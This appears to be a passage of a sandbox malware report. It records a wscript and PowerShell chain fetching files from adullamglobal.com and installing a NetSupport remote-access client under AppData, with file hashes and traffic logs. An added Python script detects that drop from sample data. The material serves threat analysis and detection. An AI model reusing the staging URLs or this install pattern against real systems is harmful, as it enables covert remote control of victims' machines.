    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: FC5405588C85400C92E991F21EA760F4 Ref B: LON601060103011 Ref C: 2024-10-24T13:17:09Z
    date: Thu, 24 Oct 2024 13:17:09 GMT
  • 79.141.162.186:443
    https://adullamglobal.com/work/fix.php?2046
    tls, http
    wscript.exe
    81.2kB
    2.3MB
    1692
    1688

    HTTP Request

    POST https://adullamglobal.com/work/fix.php?2046

    HTTP Response

    200
  • 150.171.27.10:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=
    tls, http2
    2.0kB
    9.4kB
    22
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8f91d72589b94949afe448f23b7312df&localId=w:740B9CEB-14AC-B2F7-6798-137B0EC388FF&deviceId=6825841072483399&anid=

    HTTP Response

    204
  • 2.18.190.73:80
    http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D
    http
    wscript.exe
    522 B
    1.1kB
    6
    4

    HTTP Request

    GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSSMPIJvIZYct7fBv3LjkNE5Q%3D%3D

    HTTP Response

    200
  • 79.141.162.186:443
    https://adullamglobal.com/work/das.php?13401
    tls, http
    powershell.exe
    76.5kB
    3.1MB
    1498
    2257

    HTTP Request

    GET https://adullamglobal.com/work/das.php?13401

    HTTP Response

    200
  • 5.181.159.143:443
    http
    client32.exe
    2.0kB
    814 B
    9
    7
  • 172.67.68.212:80
    http://geo.netsupportsoftware.com/location/loca.asp
    http
    client32.exe
    440 B
    1.1kB
    7
    5

    HTTP Request

    GET http://geo.netsupportsoftware.com/location/loca.asp

    HTTP Response

    200
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    https://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    tls, http2
    80.4kB
    2.3MB
    1645
    1641

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360125545_1ABMDCTEZ7ZJRMZDX&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360125544_1U4JKLLGDS2L5LDU8&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418552_1AAPCBWXWYRQF23F9&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340418551_1MWHJRW59UCHVWKN4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 8.8.8.8:53
    adullamglobal.com
    dns
    powershell.exe
    63 B
    79 B
    1
    1

    DNS Request

    adullamglobal.com

    DNS Response

    79.141.162.186

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    148 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    150.171.27.10
    150.171.28.10

  • 8.8.8.8:53
    r11.o.lencr.org
    dns
    wscript.exe
    61 B
    160 B
    1
    1

    DNS Request

    r11.o.lencr.org

    DNS Response

    2.18.190.73
    2.18.190.80

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    61.45.26.184.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    61.45.26.184.in-addr.arpa

  • 8.8.8.8:53
    186.162.141.79.in-addr.arpa
    dns
    73 B
    138 B
    1
    1

    DNS Request

    186.162.141.79.in-addr.arpa

  • 8.8.8.8:53
    73.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    73.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    10.27.171.150.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    10.27.171.150.in-addr.arpa

  • 8.8.8.8:53
    0.159.190.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    0.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    88.156.103.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    88.156.103.20.in-addr.arpa

  • 8.8.8.8:53
    geo.netsupportsoftware.com
    dns
    client32.exe
    72 B
    120 B
    1
    1

    DNS Request

    geo.netsupportsoftware.com

    DNS Response

    172.67.68.212
    104.26.0.231
    104.26.1.231

  • 8.8.8.8:53
    143.159.181.5.in-addr.arpa
    dns
    72 B
    113 B
    1
    1

    DNS Request

    143.159.181.5.in-addr.arpa

  • 8.8.8.8:53
    212.68.67.172.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    212.68.67.172.in-addr.arpa

  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    212.20.149.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    212.20.149.52.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    79.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    79.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    14.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    14.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    170 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    150.171.27.10
    150.171.28.10

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lr1ob443.xj4.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\HTCTL32.DLL

    Filesize

    320KB

    MD5

    c94005d2dcd2a54e40510344e0bb9435

    SHA1

    55b4a1620c5d0113811242c20bd9870a1e31d542

    SHA256

    3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899

    SHA512

    2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\MSVCR100.dll

    Filesize

    755KB

    MD5

    0e37fbfa79d349d672456923ec5fbbe3

    SHA1

    4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

    SHA256

    8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

    SHA512

    2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\NSM.LIC

    Filesize

    195B

    MD5

    e9609072de9c29dc1963be208948ba44

    SHA1

    03bbe27d0d1ba651ff43363587d3d6d2e170060f

    SHA256

    dc6a52ad6d637eb407cc060e98dfeedcca1167e7f62688fb1c18580dd1d05747

    SHA512

    f0e26aa63b0c7f1b31074b9d6eef88d0cfbc467f86b12205cb539a45b0352e77ce2f99f29baeab58960a197714e72289744143ba17975699d058fe75d978dfd0

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\PCICHEK.DLL

    Filesize

    18KB

    MD5

    104b30fef04433a2d2fd1d5f99f179fe

    SHA1

    ecb08e224a2f2772d1e53675bedc4b2c50485a41

    SHA256

    956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

    SHA512

    5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\PCICL32.dll

    Filesize

    3.6MB

    MD5

    d3d39180e85700f72aaae25e40c125ff

    SHA1

    f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15

    SHA256

    38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5

    SHA512

    471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe

    Filesize

    101KB

    MD5

    c4f1b50e3111d29774f7525039ff7086

    SHA1

    57539c95cba0986ec8df0fcdea433e7c71b724c6

    SHA256

    18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

    SHA512

    005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.ini

    Filesize

    669B

    MD5

    f734588a7620c48021688d3c2940353a

    SHA1

    c9b9aece48b4c134b838217426145fdd542f60e6

    SHA256

    97a2ce9683de5c9e03331d22309b5348f45cf65e77b1f011ba3505e2deafafc6

    SHA512

    0549dcc50347802c774078f6f9ecfec2b21b0c489aa8e96168ea12a2cec55169d4172baac13819a07686755697794f05ac5b75d554229faf268f9e64f54e2033

  • C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\pcicapi.dll

    Filesize

    32KB

    MD5

    34dfb87e4200d852d1fb45dc48f93cfc

    SHA1

    35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

    SHA256

    2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

    SHA512

    f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

  • memory/5024-21-0x0000012A21110000-0x0000012A21122000-memory.dmp

    Filesize

    72KB

  • memory/5024-20-0x0000012A210E0000-0x0000012A210EA000-memory.dmp

    Filesize

    40KB

  • memory/5024-18-0x00007FFCD7C90000-0x00007FFCD8751000-memory.dmp

    Filesize

    10.8MB

  • memory/5024-6-0x00007FFCD7C93000-0x00007FFCD7C95000-memory.dmp

    Filesize

    8KB

  • memory/5024-17-0x00007FFCD7C90000-0x00007FFCD8751000-memory.dmp

    Filesize

    10.8MB

  • memory/5024-10-0x0000012A08F00000-0x0000012A08F22000-memory.dmp

    Filesize

    136KB

  • memory/5024-86-0x00007FFCD7C90000-0x00007FFCD8751000-memory.dmp

    Filesize

    10.8MB
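
The Downloads list above is the complete NetSupport client set (client32.exe, client32.ini, NSM.LIC, PCICL32.dll, HTCTL32.DLL, PCICHEK.DLL, pcicapi.dll, MSVCR100.dll) dropped into a user-writable folder; the __PSScriptPolicyTest_*.ps1 file in Temp is PowerShell's own execution-policy probe, not a dropped artefact. The following is an added example, not part of the tria.ge report: triage checks that look for that file set outside a vendor install path, for a Run value launching client32.exe, and for the two network behaviours client32.exe showed in the capture (the geo.netsupportsoftware.com location check-in and what the sandbox classified as plain HTTP to a bare IP on port 443). The registry values, file listing and proxy events are constructed sample data modelled on the report, and treating only Program Files\NetSupport as a trusted location is an assumption of this example, not something the report states.

```python
"""
Added example, not part of the tria.ge report: host and network triage checks
for the NetSupport drop documented above, run here over constructed sample
data standing in for a live Run key, file listing and proxy log.
"""
from __future__ import annotations

import ntpath
from typing import Iterable

# File set the sandbox saw written to %APPDATA%\DEXHCUYIT0 (see "Downloads").
NETSUPPORT_FILES = {"client32.exe", "client32.ini", "nsm.lic", "pcicl32.dll",
                    "htctl32.dll", "pcichek.dll", "pcicapi.dll", "msvcr100.dll"}
# Vendor geolocation check-in client32.exe made in the network capture.
GEO_HOST, GEO_PATH = "geo.netsupportsoftware.com", "/location/loca.asp"
# Assumption for this example: a sanctioned NetSupport install lives under
# Program Files; a client set anywhere else (AppData, Temp, ProgramData) is suspect.
TRUSTED_PREFIXES = (r"c:\program files\netsupport", r"c:\program files (x86)\netsupport")


def _trusted(path: str) -> bool:
    return path.lower().startswith(TRUSTED_PREFIXES)


def find_netsupport_drops(paths: Iterable[str], min_files: int = 3) -> list[dict]:
    """Directories outside the trusted location that hold client32.exe plus at
    least `min_files` members of the NetSupport file set."""
    by_dir: dict[str, set[str]] = {}
    for p in paths:
        d, name = ntpath.split(p)
        by_dir.setdefault(d, set()).add(name.lower())
    hits = []
    for d, names in by_dir.items():
        found = names & NETSUPPORT_FILES
        if "client32.exe" in found and len(found) >= min_files and not _trusted(d):
            # NSM.LIC in a user-writable folder means the operator shipped a licence.
            hits.append({"dir": d, "files": sorted(found), "has_licence": "nsm.lic" in found})
    return hits


def suspicious_run_entries(run_values: dict[str, str]) -> list[tuple[str, str]]:
    """HKCU Run values whose command launches client32.exe from an untrusted path."""
    out = []
    for name, data in run_values.items():
        exe = data[1:].split('"', 1)[0] if data.startswith('"') else data.split(" ", 1)[0]
        if ntpath.basename(exe).lower() == "client32.exe" and not _trusted(exe):
            out.append((name, exe))
    return out


def netsupport_network_hits(events: Iterable[dict]) -> list[str]:
    """Flag the vendor geolocation check-in and what the sandbox classed as plain
    HTTP to a bare IP on port 443, both seen from client32.exe in the report."""
    hits = []
    for e in events:
        if e["host"] == GEO_HOST and e["path"].startswith(GEO_PATH):
            hits.append(f"{e['process']} geolocation check-in {GEO_HOST}{e['path']}")
        elif e["proto"] == "http" and e["port"] == 443 and not e["host"]:
            hits.append(f"{e['process']} cleartext HTTP to bare IP {e['ip']}:443")
    return hits


# Constructed sample data modelled on the report (not real telemetry).
RUN_VALUES = {
    "OneDrive": r"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "PBHHYCWP": r"C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe",
}
FILES = [
    r"C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.exe",
    r"C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\client32.ini",
    r"C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\NSM.LIC",
    r"C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\PCICL32.dll",
    r"C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\HTCTL32.DLL",
    r"C:\Users\Admin\AppData\Roaming\DEXHCUYIT0\CXCC.zip",
    r"C:\Users\Admin\AppData\Local\Temp\client32.exe",  # lone copy, below threshold
    r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe",
    r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini",
    r"C:\Program Files (x86)\NetSupport\NetSupport Manager\NSM.LIC",
]
EVENTS = [
    {"process": "client32.exe", "ip": "172.67.68.212", "port": 80, "proto": "http",
     "host": GEO_HOST, "path": GEO_PATH},
    {"process": "client32.exe", "ip": "5.181.159.143", "port": 443, "proto": "http",
     "host": "", "path": ""},
    {"process": "msedge.exe", "ip": "150.171.27.10", "port": 443, "proto": "tls",
     "host": "tse1.mm.bing.net", "path": "/th"},
]


def triage() -> dict:
    return {"drops": find_netsupport_drops(FILES),
            "run": suspicious_run_entries(RUN_VALUES),
            "net": netsupport_network_hits(EVENTS)}


if __name__ == "__main__":
    for section, rows in triage().items():
        print(section)
        for r in rows:
            print("  ", r)
```

Matching on the file set rather than the folder name matters because the dropper randomises the DEXHCUYIT suffix; the geolocation check-in is the same one a legitimate client makes, so on its own it only tells you NetSupport is running, and the source path is what separates an intrusion from an approved install.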
